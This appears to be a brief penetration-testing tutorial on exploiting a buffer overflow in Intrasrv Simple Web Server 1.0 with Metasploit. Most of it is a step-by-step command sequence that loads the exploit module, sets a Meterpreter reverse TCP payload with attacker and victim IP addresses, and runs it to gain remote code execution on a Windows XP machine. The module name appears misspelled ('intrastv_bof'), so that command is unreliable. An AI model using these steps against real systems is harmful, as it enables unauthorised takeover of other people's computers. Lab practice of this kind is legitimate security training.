Kali Linux, Penetration Testing

Hack Remote PC using Intrasrv 1.0 Buffer Overflow

This module exploits a boundary condition error in Intrasrv Simple Web Server 1.0. The web interface does not validate the boundaries of an HTTP request string prior to copying the data to an insufficiently large buffer. Successful exploitation leads to arbitrary remote code execution in the context of the application.

Exploit Targets

Simple Web Server 1.0

Requirement

Attacker: Kali Linux

Victim PC: Windows XP SP 3

Open Kali Linux terminal type msfconsole

Now type use exploit/windows/http/intrastv_bof

msf exploit (intrastv_bof)>set payload windows/meterpreter/reverse_tcp

msf exploit (intrastv_bof)>set lhost 192.168.1.5 (IP of Local Host)

msf exploit (intrastv_bof)>set rhost 192.168.1.3 (IP of Victim PC)

msf exploit (intrastv_bof)>exploit